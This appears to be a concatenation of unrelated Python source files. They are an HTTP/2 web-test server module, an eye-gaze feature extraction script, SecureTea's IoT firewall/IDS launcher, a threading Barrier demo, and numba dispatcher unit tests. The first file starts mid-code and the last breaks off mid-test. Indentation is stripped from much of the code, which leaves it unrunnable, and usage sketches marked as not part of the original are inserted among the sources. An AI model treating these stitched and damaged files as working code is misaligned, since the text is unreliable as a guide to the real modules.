# Convert this to a handler that will utilise H2 specific functionality, such as handling individual frames
req_handler = self.frame_handler(request, response, req_handler)
if hasattr(req_handler, 'handle_headers'):
req_handler.handle_headers(frame, request, response)
elif isinstance(frame, DataReceived):
wfile.write(frame.data)
if hasattr(req_handler, 'handle_data'):
req_handler.handle_data(frame, request, response)
if frame.stream_ended:
wfile.close()
elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)):
self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id))
break
if request is not None:
request.frames.append(frame)
if hasattr(frame, "stream_ended") and frame.stream_ended:
try:
self.finish_handling(request, response, req_handler)
except StreamClosedError:
self.logger.debug('(%s - %s) Unable to write response; stream closed' %
(self.uid, stream_id))
break
def frame_handler(self, request, response, handler):
try:
return handler.frame_handler(request)
except HTTPException as e:
response.set_error(e.code, str(e))
response.write()
except Exception as e:
self.respond_with_error(response, e)
response.write()
class H2ConnectionGuard(object):
"""H2Connection objects are not threadsafe, so this keeps thread safety"""
lock = threading.Lock()
def __init__(self, obj):
assert isinstance(obj, H2Connection)
self.obj = obj
def __enter__(self):
self.lock.acquire()
return self.obj
def __exit__(self, exception_type, exception_value, traceback):
self.lock.release()
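# Minimal usage sketch (not part of the original module): per-stream code is
# expected to take the guard before touching the shared H2Connection, as
# _stream_ws_sub_thread does above. `handler` is assumed to be an H2HandlerCopy
# whose `conn` attribute is an H2ConnectionGuard and whose `request` attribute
# is the underlying socket.
def _example_guarded_send(handler, stream_id, payload):
    with handler.conn as connection:
        # Only one thread at a time may mutate the shared connection state.
        connection.send_data(stream_id, payload, end_stream=True)
        handler.request.sendall(connection.data_to_send())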
class H2Headers(dict):
def __init__(self, headers):
self.raw_headers = OrderedDict()
for key, val in headers:
key = isomorphic_decode(key)
val = isomorphic_decode(val)
self.raw_headers[key] = val
dict.__setitem__(self, self._convert_h2_header_to_h1(key), val)
def _convert_h2_header_to_h1(self, header_key):
if header_key[1:] in h2_headers and header_key[0] == ':':
return header_key[1:]
else:
return header_key
# TODO This does not seem relevant for H2 headers, so using a dummy function for now
def getallmatchingheaders(self, header):
return ['dummy function']
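# Sketch (not part of the original module) of the pseudo-header mapping above,
# assuming the module-level h2_headers list includes 'method' and 'path':
def _example_h2headers_mapping():
    headers = H2Headers([(b':method', b'GET'),
                         (b':path', b'/echo'),
                         (b'x-test', b'1')])
    # ':method' and ':path' are exposed under their HTTP/1.1-style names ...
    assert headers['method'] == 'GET' and headers['path'] == '/echo'
    # ... while raw_headers keeps the original HTTP/2 keys untouched.
    assert ':method' in headers.raw_headers and 'x-test' in headers.raw_headers
    return headers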
class H2HandlerCopy(object):
def __init__(self, handler, req_frame, rfile):
self.headers = H2Headers(req_frame.headers)
self.command = self.headers['method']
self.path = self.headers['path']
self.h2_stream_id = req_frame.stream_id
self.server = handler.server
self.protocol_version = handler.protocol_version
self.client_address = handler.client_address
self.raw_requestline = ''
self.rfile = rfile
self.request = handler.request
self.conn = handler.conn
class Http1WebTestRequestHandler(BaseWebTestRequestHandler):
protocol_version = "HTTP/1.1"
def handle_one_request(self):
response = None
try:
self.close_connection = False
request_line_is_valid = self.get_request_line()
if self.close_connection:
return
request_is_valid = self.parse_request()
if not request_is_valid:
#parse_request() actually sends its own error responses
return
self.finish_handling_h1(request_line_is_valid)
except socket.timeout as e:
self.log_error("Request timed out: %r", e)
self.close_connection = True
return
except Exception:
err = traceback.format_exc()
if response:
response.set_error(500, err)
response.write()
def get_request_line(self):
try:
self.raw_requestline = self.rfile.readline(65537)
except OSError:
self.close_connection = True
return False
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
return False
if not self.raw_requestline:
self.close_connection = True
return True
class WebTestHttpd(object):
"""
:param host: Host from which to serve (default: 127.0.0.1)
:param port: Port from which to serve (default: 8000)
:param server_cls: Class to use for the server (default depends on ssl vs non-ssl)
:param handler_cls: Class to use for the RequestHandler
:param use_ssl: Use a SSL server if no explicit server_cls is supplied
:param key_file: Path to key file to use if ssl is enabled
:param certificate: Path to certificate file to use if ssl is enabled
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
:param router_cls: Router class to use when matching URLs to handlers
:param doc_root: Document root for serving files
:param ws_doc_root: Document root for websockets
:param routes: List of routes with which to initialize the router
:param rewriter_cls: Class to use for request rewriter
:param rewrites: List of rewrites with which to initialize the rewriter_cls
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param bind_address: Boolean indicating whether to bind server to IP address.
:param latency: Delay in ms to wait before serving each response, or
callable that returns a delay in ms
HTTP server designed for testing scenarios.
Takes a router class which provides one method get_handler which takes a Request
and returns a handler function.
.. attribute:: host
The host name or ip address of the server
.. attribute:: port
The port on which the server is running
.. attribute:: router
The Router object used to associate requests with resources for this server
.. attribute:: rewriter
The Rewriter object used for URL rewriting
.. attribute:: use_ssl
Boolean indicating whether the server is using ssl
.. attribute:: started
Boolean indicating whether the server is running
"""
def __init__(self, host="127.0.0.1", port=8000,
server_cls=None, handler_cls=Http1WebTestRequestHandler,
use_ssl=False, key_file=None, certificate=None, encrypt_after_connect=False,
router_cls=Router, doc_root=os.curdir, ws_doc_root=None, routes=None,
rewriter_cls=RequestRewriter, bind_address=True, rewrites=None,
latency=None, config=None, http2=False):
if routes is None:
routes = default_routes.routes
self.host = host
self.router = router_cls(doc_root, routes)
self.rewriter = rewriter_cls(rewrites if rewrites is not None else [])
self.use_ssl = use_ssl
self.http2 = http2
self.logger = get_logger()
if server_cls is None:
server_cls = WebTestServer
if use_ssl:
            if not os.path.exists(key_file):
                raise ValueError("SSL key file not found: {}".format(key_file))
            if not os.path.exists(certificate):
                raise ValueError("SSL certificate not found: {}".format(certificate))
try:
self.httpd = server_cls((host, port),
handler_cls,
self.router,
self.rewriter,
config=config,
bind_address=bind_address,
ws_doc_root=ws_doc_root,
use_ssl=use_ssl,
key_file=key_file,
certificate=certificate,
encrypt_after_connect=encrypt_after_connect,
latency=latency,
http2=http2)
self.started = False
_host, self.port = self.httpd.socket.getsockname()
except Exception:
self.logger.critical("Failed to start HTTP server on port %s; "
"is something already using that port?" % port)
raise
def start(self):
"""Start the server.
:param block: True to run the server on the current thread, blocking,
False to run on a separate thread."""
http_type = "http2" if self.http2 else "https" if self.use_ssl else "http"
self.logger.info("Starting %s server on %s:%s" % (http_type, self.host, self.port))
self.started = True
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.httpd.shutdown()
self.httpd.server_close()
self.server_thread.join()
self.server_thread = None
self.logger.info("Stopped http server on %s:%s" % (self.host, self.port))
except AttributeError:
pass
self.started = False
self.httpd = None
def get_url(self, path="/", query=None, fragment=None):
if not self.started:
return None
return urlunsplit(("http" if not self.use_ssl else "https",
"%s:%s" % (self.host, self.port),
path, query, fragment))
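# Minimal usage sketch (not part of the original module), assuming the default
# routes and the current working directory are acceptable as a document root;
# port=0 asks the OS for a free port, which is then read back into httpd.port.
def _example_run_httpd():
    httpd = WebTestHttpd(host="127.0.0.1", port=0, doc_root=".")
    httpd.start()                    # serves on a background daemon thread
    url = httpd.get_url("/example")  # e.g. http://127.0.0.1:<bound port>/example
    httpd.stop()
    return url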
class _WebSocketConnection(object):
def __init__(self, request_handler, response):
"""Mimic mod_python mp_conn.
:param request_handler: A H2HandlerCopy instance.
:param response: A H2Response instance.
"""
self._request_handler = request_handler
self._response = response
self.remote_addr = self._request_handler.client_address
def write(self, data):
self._response.writer.write_data(data, False)
def read(self, length):
return self._request_handler.rfile.read(length)
class _WebSocketRequest(object):
def __init__(self, request_handler, response):
"""Mimic mod_python request.
:param request_handler: A H2HandlerCopy instance.
:param response: A H2Response instance.
"""
self.connection = _WebSocketConnection(request_handler, response)
self.protocol = "HTTP/2"
self._response = response
self.uri = request_handler.path
self.unparsed_uri = request_handler.path
self.method = request_handler.command
# read headers from request_handler
self.headers_in = request_handler.headers
# write headers directly into H2Response
self.headers_out = response.headers
# proxies status to H2Response
@property
def status(self):
return self._response.status
@status.setter
def status(self, status):
self._response.status = status
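# Sketch (not part of the original module): how the two adapters above are
# combined in _stream_ws_thread so that the WebSocket handshaker and dispatcher
# only ever see a mod_python-style request object.
def _example_wrap_ws_request(stream_handler, h2response):
    request = _WebSocketRequest(stream_handler, h2response)
    # Writes are forwarded to the H2Response writer as DATA frames; reads come
    # from the per-stream pipe owned by the stream handler.
    return request.method, request.uri, request.headers_in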
|
00_compute_features.py
|
import numpy as np
import os
from config import conf
from featureExtraction import gaze_analysis as ga
import threading
import getopt
import sys
from config import names as gs
def compute_sliding_window_features(participant, ws, gazeAnalysis_instance):
"""
    uses the gazeAnalysis instance it was given to compute window features and saves them to file
"""
window_features, window_times = gazeAnalysis_instance.get_window_features(ws, conf.get_step_size(ws))
np.save(conf.get_window_features_file(participant, ws), window_features)
np.save(conf.get_window_times_file(participant, ws), window_times)
if __name__ == "__main__":
for p in xrange(0,conf.n_participants):
threads = [] # one thread per time window will be used and collected in this list
# create data folder, plus one subfolder for participant p
if not os.path.exists(conf.get_feature_folder(p)):
os.makedirs(conf.get_feature_folder(p))
# make sure all relevant raw data files exist in the right folder
gaze_file = conf.get_data_folder(p) + '/gaze_positions.csv'
pupil_diameter_file = conf.get_data_folder(p) + '/pupil_diameter.csv'
events_file = conf.get_data_folder(p) + '/events.csv'
assert os.path.exists(gaze_file) and os.path.exists(pupil_diameter_file) and os.path.exists(events_file)
# load relevant data
gaze = np.genfromtxt(gaze_file, delimiter=',', skip_header=1)
pupil_diameter = np.genfromtxt(pupil_diameter_file, delimiter=',', skip_header=1)
events = np.genfromtxt(events_file, delimiter=',', skip_header=1, dtype=str)
# create instance of gazeAnalysis class that will be used for feature extraction
# this already does some initial computation that will be useful for all window sizes:
extractor = ga.gazeAnalysis(gaze, conf.fixation_radius_threshold, conf.fixation_duration_threshold,
conf.saccade_min_velocity, conf.max_saccade_duration,
pupil_diameter=pupil_diameter, event_strings=events)
# compute sliding window features by creating one thread per window size
for window_size in conf.all_window_sizes:
if not os.path.exists(conf.get_window_features_file(p, window_size)):
thread = threading.Thread(target=compute_sliding_window_features, args=(p, window_size, extractor))
thread.start()
threads.append(thread)
for t in threads:
t.join()
print 'finished all features for participant', p
# Merge the features from all participants into three files per window_size:
# merged_features includes all features
# merged_traits contains the ground truth personality score ranges
# merged_ids contains the participant number and context (way, shop, half of the recording)
# load ground truth from info folder:
binned_personality = np.genfromtxt(conf.binned_personality_file, delimiter=',', skip_header=1)
trait_labels = np.loadtxt(conf.binned_personality_file, delimiter=',', dtype=str)[0,:]
annotation = np.genfromtxt(conf.annotation_path, delimiter=',', skip_header=1)
for window_size in conf.all_window_sizes:
print 'merging window size', window_size
windowfeats_subtask_all = []
windowfeats_subtask_ids = []
windowfeats_subtask_all_y = []
for p in xrange(0, conf.n_participants):
featfilename = conf.get_window_features_file(p, window_size)
timesfilename = conf.get_window_times_file(p, window_size)
if os.path.exists(featfilename) and os.path.exists(timesfilename):
data = np.load(featfilename).tolist()
windowfeats_subtask_all.extend(data)
windowfeats_subtask_all_y.extend([binned_personality[p, 1:]] * len(data))
times = np.load(timesfilename)[:, 2:]
ann = annotation[p,1:]
ids_annotation = np.zeros((len(data), 3), dtype=int) # person, way/shop, half
ids_annotation[:,0] = p
ids_annotation[(times[:,1] < ann[0]),1] = conf.time_window_annotation_wayI
ids_annotation[(times[:,0] > ann[0]) & (times[:,1] < ann[1]),1] = conf.time_window_annotation_shop
ids_annotation[(times[:,0] > ann[1]),1] = conf.time_window_annotation_wayII
ids_annotation[:(len(data)/2), 2] = conf.time_window_annotation_halfI
ids_annotation[(len(data)/2):, 2] = conf.time_window_annotation_halfII
windowfeats_subtask_ids.extend(ids_annotation.tolist())
else:
print 'did not find ', featfilename
sys.exit(1)
ids = np.array(windowfeats_subtask_ids)
x = np.array(windowfeats_subtask_all, dtype=float)
y = np.array(windowfeats_subtask_all_y)
f1, f2, f3 = conf.get_merged_feature_files(window_size)
np.savetxt(f1, x, delimiter=',', header=','.join(gs.full_long_label_list), comments='')
np.savetxt(f2, y, delimiter=',', header=','.join(trait_labels), comments='')
np.savetxt(f3, ids, delimiter=',', header='Participant ID', comments='')
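# Sketch (not part of the original script) of reading the three merged files
# back in; conf.get_merged_feature_files is assumed to return the same
# (features, traits, ids) triple of paths that was used for saving above.
def load_merged_window(window_size):
    f1, f2, f3 = conf.get_merged_feature_files(window_size)
    x = np.genfromtxt(f1, delimiter=',', skip_header=1)    # window features
    y = np.genfromtxt(f2, delimiter=',', skip_header=1)    # binned trait scores
    ids = np.genfromtxt(f3, delimiter=',', skip_header=1)  # participant/context ids
    return x, y, ids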
|
iot_mode.py
|
# -*- coding: utf-8 -*-
u"""IoT Mode for SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Abhishek Sharma <abhishek_official@hotmail.com> , Jul 31 2019
Version: 1.5.1
Module: SecureTea
"""
# Import all the modules necessary for IoT mode
from securetea.lib.ids import secureTeaIDS
from securetea.lib.firewall import secureTeaFirewall
from securetea.lib.iot import iot_checker
from securetea import logger
import multiprocessing
import sys
class IoTMode(object):
"""IoTMode class."""
def __init__(self, debug=False, cred=None):
"""
Initialize IoTMode.
Args:
debug (bool): Log on terminal or not
cred (dict): Configuration credentials
Raises:
None
        Returns:
None
"""
self.debug = debug
# Initialize logger
self.logger = logger.SecureTeaLogger(
__name__,
debug=self.debug
)
# Initialize credentials
if cred is not None:
self.cred = cred
else:
self.logger.log(
"No configuraton parameters found, exiting",
logtype="error"
)
sys.exit(0)
# Initialize objects presence as false
self.firewall = False
self.ids = False
self.iot_checker = False
# Initialize empty process pool list
self.process_pool = []
def create_objects(self):
"""
Create module (Firewall, IDS, IoT Checker) objects
        if configuration parameters are available for them.
Args:
None
Raises:
None
Returns:
None
"""
if self.cred.get("firewall"):
try:
self.logger.log(
"Initializing Firewall object",
logtype="info"
)
# Initialize Firewall object
self.firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.debug)
self.firewall = True
self.logger.log(
"Initialized Firewall object",
logtype="info"
)
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("ids"):
try:
self.logger.log(
"Initializing IDS object",
logtype="info"
)
# Initialize IDS object
self.ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.debug)
self.ids = True
self.logger.log(
"Initialized IDS object",
logtype="info"
)
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
try:
self.logger.log(
"Initializing IoT checker object",
logtype="info"
)
# Initialize IoT Checker object
self.iot_checker_obj = iot_checker.IoTChecker(debug=self.debug,
api_key=self.cred['iot-check']['shodan-api-key'],
                                                          ip=self.cred['iot-check']['ip'])
            # Mark the IoT checker as available so create_process() starts it,
            # mirroring the firewall and IDS branches above.
            self.iot_checker = True
except KeyError:
self.logger.log(
"IoT checker parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def create_process(self):
"""
        Create processes for the initialized objects.
Args:
None
Raises:
None
Returns:
None
"""
if self.firewall: # if Firewall object is initialized
firewall_process = multiprocessing.Process(target=self.firewallObj.start_firewall)
self.process_pool.append(firewall_process)
if self.ids: # if IDS object is initialized
ids_process = multiprocessing.Process(target=self.ids_obj.start_ids)
self.process_pool.append(ids_process)
if self.iot_checker: # if IoT object is initialized
iot_checker_process = multiprocessing.Process(target=self.iot_checker_obj.check_shodan_range)
self.process_pool.append(iot_checker_process)
def start_process(self):
"""
        Start all the processes in the process pool
        and terminate gracefully on KeyboardInterrupt.
Args:
None
Raises:
None
Returns:
None
"""
try:
for process in self.process_pool:
process.start()
for process in self.process_pool:
process.join()
except KeyboardInterrupt:
for process in self.process_pool:
process.terminate()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def start_iot_mode(self):
"""
Start SecureTea in IoT mode.
Args:
None
Raises:
None
Returns:
None
"""
# Create / initialize required objects
self.create_objects()
# Create process for the objects
self.create_process()
# Start the process
self.start_process()
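# Minimal usage sketch (not part of the original module). The top-level keys
# mirror the ones read in create_objects(); the contents of each sub-dictionary
# depend on the SecureTea configuration and are placeholders here.
def example_start_iot_mode():
    # Each top-level entry must be truthy for the corresponding module to be
    # created; empty dicts here would simply skip the firewall/IDS branches.
    cred = {
        "firewall": {"...": "..."},                # placeholder firewall settings
        "ids": {"...": "..."},                     # placeholder IDS settings
        "iot-check": {
            "shodan-api-key": "<shodan-api-key>",  # placeholder API key
            "ip": "",                              # empty: let IoTChecker choose
        },
    }
    mode = IoTMode(debug=True, cred=cred)
    mode.start_iot_mode()                          # blocks until the processes exit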
|
barrier.py
|
# case study: a quiz-competition race synchronized with a Barrier
from random import randrange
from threading import Barrier, Thread
from time import ctime, sleep
num_cerdascermat = 5
hasilakhir = Barrier(num_cerdascermat)
peserta = ['nisa', 'rama', 'titin', 'nur', 'ayu']
def siswa():
name = peserta.pop()
    sleep(randrange(2, 7))  # wait for a random duration between 2 and 6 seconds
    print('%s finished working at: %s \n' % (name, ctime()))
    hasilakhir.wait()  # block the calling thread until every participant
                       # has reached the barrier
def main():
threads = []
    print('start working!!')
    for i in range(num_cerdascermat):  # create one thread per participant to run the function
        threads.append(Thread(target=siswa))
        threads[-1].start()  # start the thread
for thread in threads:
thread.join()
    print('done!')  # all threads have finished
if __name__ == "__main__":
main()
|
test_dispatcher.py
|
from __future__ import print_function, division, absolute_import
import errno
import multiprocessing
import os
import shutil
import subprocess
import sys
import threading
import warnings
import inspect
import numpy as np
from numba import unittest_support as unittest
from numba import utils, jit, generated_jit, types, typeof
from numba import _dispatcher
from numba.compiler import compile_isolated
from numba.errors import NumbaWarning
from .support import (TestCase, tag, temp_directory, import_dynamic,
override_env_config, capture_cache_log, captured_stdout)
from numba.targets import codegen
from numba.caching import _UserWideCacheLocator
import llvmlite.binding as ll
def dummy(x):
return x
def add(x, y):
return x + y
def addsub(x, y, z):
return x - y + z
def addsub_defaults(x, y=2, z=3):
return x - y + z
def star_defaults(x, y=2, *z):
return x, y, z
def generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x, y):
return x + y
else:
def impl(x, y):
return x - y
return impl
def bad_generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x):
return x
else:
def impl(x, y=6):
return x - y
return impl
class BaseTest(TestCase):
jit_args = dict(nopython=True)
def compile_func(self, pyfunc):
def check(*args, **kwargs):
expected = pyfunc(*args, **kwargs)
result = f(*args, **kwargs)
self.assertPreciseEqual(result, expected)
f = jit(**self.jit_args)(pyfunc)
return f, check
def check_access_is_preventable():
# This exists to check whether it is possible to prevent access to
# a file/directory through the use of `chmod 500`. If a user has
# elevated rights (e.g. root) then writes are likely to be possible
# anyway. Tests that require functioning access prevention are
# therefore skipped based on the result of this check.
tempdir = temp_directory('test_cache')
test_dir = (os.path.join(tempdir, 'writable_test'))
os.mkdir(test_dir)
# assume access prevention is not possible
ret = False
# check a write is possible
with open(os.path.join(test_dir, 'write_ok'), 'wt') as f:
f.write('check1')
# now forbid access
os.chmod(test_dir, 0o500)
try:
with open(os.path.join(test_dir, 'write_forbidden'), 'wt') as f:
f.write('check2')
except (OSError, IOError) as e:
# Check that the cause of the exception is due to access/permission
# as per https://github.com/conda/conda/blob/4.5.0/conda/gateways/disk/permissions.py#L35-L37
eno = getattr(e, 'errno', None)
if eno in (errno.EACCES, errno.EPERM):
# errno reports access/perm fail so access prevention via
# `chmod 500` works for this user.
ret = True
finally:
os.chmod(test_dir, 0o775)
shutil.rmtree(test_dir)
return ret
_access_preventable = check_access_is_preventable()
_access_msg = "Cannot create a directory to which writes are preventable"
skip_bad_access = unittest.skipUnless(_access_preventable, _access_msg)
class TestDispatcher(BaseTest):
def test_dyn_pyfunc(self):
@jit
def foo(x):
return x
foo(1)
[cr] = foo.overloads.values()
        # __module__ must match that of foo
self.assertEqual(cr.entry_point.__module__, foo.py_func.__module__)
def test_no_argument(self):
@jit
def foo():
return 1
# Just make sure this doesn't crash
foo()
def test_coerce_input_types(self):
# Issue #486: do not allow unsafe conversions if we can still
# compile other specializations.
c_add = jit(nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
self.assertPreciseEqual(c_add(12.3, 45.6), add(12.3, 45.6))
self.assertPreciseEqual(c_add(12.3, 45.6j), add(12.3, 45.6j))
self.assertPreciseEqual(c_add(12300000000, 456), add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = jit('(i4, i4)', nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
# Implicit (unsafe) conversion of float to int
self.assertPreciseEqual(c_add(12.3, 45.6), add(12, 45))
with self.assertRaises(TypeError):
# Implicit conversion of complex to int disallowed
c_add(12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
@jit
def foo(a, b):
return a + b
INT = 1
FLT = 1.5
self.assertAlmostEqual(foo(INT, FLT), INT + FLT)
self.assertEqual(len(foo.overloads), 1)
self.assertAlmostEqual(foo(FLT, INT), FLT + INT)
self.assertEqual(len(foo.overloads), 2)
self.assertAlmostEqual(foo(FLT, FLT), FLT + FLT)
self.assertEqual(len(foo.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
self.assertAlmostEqual(foo(1, 1), INT + INT)
self.assertEqual(len(foo.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@jit
def foo(x):
return x + 1
def wrapper():
try:
self.assertEqual(foo(1), 2)
except BaseException as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_explicit_signatures(self):
f = jit("(int64,int64)")(add)
# Approximate match (unsafe conversion)
self.assertPreciseEqual(f(1.5, 2.5), 3)
self.assertEqual(len(f.overloads), 1, f.overloads)
f = jit(["(int64,int64)", "(float64,float64)"])(add)
# Exact signature matches
self.assertPreciseEqual(f(1, 2), 3)
self.assertPreciseEqual(f(1.5, 2.5), 4.0)
# Approximate match (int32 -> float64 is a safe conversion)
self.assertPreciseEqual(f(np.int32(1), 2.5), 3.5)
# No conversion
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertIn("No matching definition", str(cm.exception))
self.assertEqual(len(f.overloads), 2, f.overloads)
# A more interesting one...
f = jit(["(float32,float32)", "(float64,float64)"])(add)
self.assertPreciseEqual(f(np.float32(1), np.float32(2**-25)), 1.0)
self.assertPreciseEqual(f(1, 2**-25), 1.0000000298023224)
# Fail to resolve ambiguity between the two best overloads
f = jit(["(float32,float64)",
"(float64,float32)",
"(int64,int64)"])(add)
with self.assertRaises(TypeError) as cm:
f(1.0, 2.0)
# The two best matches are output in the error message, as well
# as the actual argument types.
self.assertRegexpMatches(
str(cm.exception),
r"Ambiguous overloading for <function add [^>]*> \(float64, float64\):\n"
r"\(float32, float64\) -> float64\n"
r"\(float64, float32\) -> float64"
)
# The integer signature is not part of the best matches
self.assertNotIn("int64", str(cm.exception))
def test_signature_mismatch(self):
tmpl = "Signature mismatch: %d argument types given, but function takes 2 arguments"
with self.assertRaises(TypeError) as cm:
jit("()")(add)
self.assertIn(tmpl % 0, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,)")(add)
self.assertIn(tmpl % 1, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,intc,intc)")(add)
self.assertIn(tmpl % 3, str(cm.exception))
# With forceobj=True, an empty tuple is accepted
jit("()", forceobj=True)(add)
with self.assertRaises(TypeError) as cm:
jit("(intc,)", forceobj=True)(add)
self.assertIn(tmpl % 1, str(cm.exception))
def test_matching_error_message(self):
f = jit("(intc,intc)")(add)
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertEqual(str(cm.exception),
"No matching definition for argument type(s) "
"complex128, complex128")
def test_disabled_compilation(self):
@jit
def foo(a):
return a
foo.compile("(float32,)")
foo.disable_compile()
with self.assertRaises(RuntimeError) as raises:
foo.compile("(int32,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 1)
def test_disabled_compilation_through_list(self):
@jit(["(float32,)", "(int32,)"])
def foo(a):
return a
with self.assertRaises(RuntimeError) as raises:
foo.compile("(complex64,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 2)
def test_disabled_compilation_nested_call(self):
@jit(["(intp,)"])
def foo(a):
return a
@jit
def bar():
foo(1)
foo(np.ones(1)) # no matching definition
with self.assertRaises(TypeError) as raises:
bar()
m = "No matching definition for argument type(s) array(float64, 1d, C)"
self.assertEqual(str(raises.exception), m)
def test_fingerprint_failure(self):
"""
Failure in computing the fingerprint cannot affect a nopython=False
function. On the other hand, with nopython=True, a ValueError should
be raised to report the failure with fingerprint.
"""
@jit
def foo(x):
return x
# Empty list will trigger failure in compile_fingerprint
errmsg = 'cannot compute fingerprint of empty list'
with self.assertRaises(ValueError) as raises:
_dispatcher.compute_fingerprint([])
self.assertIn(errmsg, str(raises.exception))
# It should work in fallback
self.assertEqual(foo([]), [])
# But, not in nopython=True
strict_foo = jit(nopython=True)(foo.py_func)
with self.assertRaises(ValueError) as raises:
strict_foo([])
self.assertIn(errmsg, str(raises.exception))
# Test in loop lifting context
@jit
def bar():
object() # force looplifting
x = []
for i in range(10):
x = foo(x)
return x
self.assertEqual(bar(), [])
# Make sure it was looplifted
[cr] = bar.overloads.values()
self.assertEqual(len(cr.lifted), 1)
class TestSignatureHandling(BaseTest):
"""
Test support for various parameter passing styles.
"""
@tag('important')
def test_named_args(self):
"""
Test passing named arguments to a dispatcher.
"""
f, check = self.compile_func(addsub)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# All calls above fall under the same specialization
self.assertEqual(len(f.overloads), 1)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected 3, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6)
self.assertIn("missing argument 'z'", str(cm.exception))
def test_default_args(self):
"""
Test omitting arguments with a default value.
"""
f, check = self.compile_func(addsub_defaults)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# Now omitting some values
check(3, z=10)
check(3, 4)
check(x=3, y=4)
check(3)
check(x=3)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected at least 1, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(y=6, z=7)
self.assertIn("missing argument 'x'", str(cm.exception))
def test_star_args(self):
"""
Test a compiled function with starargs in the signature.
"""
f, check = self.compile_func(star_defaults)
check(4)
check(4, 5)
check(4, 5, 6)
check(4, 5, 6, 7)
check(4, 5, 6, 7, 8)
check(x=4)
check(x=4, y=5)
check(4, y=5)
with self.assertRaises(TypeError) as cm:
f(4, 5, y=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, 5, z=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, x=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
class TestSignatureHandlingObjectMode(TestSignatureHandling):
"""
    Same as TestSignatureHandling, but in object mode.
"""
jit_args = dict(forceobj=True)
class TestGeneratedDispatcher(TestCase):
"""
Tests for @generated_jit.
"""
@tag('important')
def test_generated(self):
f = generated_jit(nopython=True)(generated_usecase)
self.assertEqual(f(8), 8 - 5)
self.assertEqual(f(x=8), 8 - 5)
self.assertEqual(f(x=8, y=4), 8 - 4)
self.assertEqual(f(1j), 5 + 1j)
self.assertEqual(f(1j, 42), 42 + 1j)
self.assertEqual(f(x=1j, y=7), 7 + 1j)
def test_signature_errors(self):
"""
Check error reporting when implementation signature doesn't match
generating function signature.
"""
f = generated_jit(nopython=True)(bad_generated_usecase)
# Mismatching # of arguments
with self.assertRaises(TypeError) as raises:
f(1j)
self.assertIn("should be compatible with signature '(x, y=5)', but has signature '(x)'",
str(raises.exception))
# Mismatching defaults
with self.assertRaises(TypeError) as raises:
f(1)
self.assertIn("should be compatible with signature '(x, y=5)', but has signature '(x, y=6)'",
str(raises.exception))
class TestDispatcherMethods(TestCase):
def test_recompile(self):
closure = 1
@jit
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2.5)
self.assertEqual(len(foo.signatures), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
# Everything was recompiled
self.assertEqual(len(foo.signatures), 2)
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3.5)
def test_recompile_signatures(self):
# Same as above, but with an explicit signature on @jit.
closure = 1
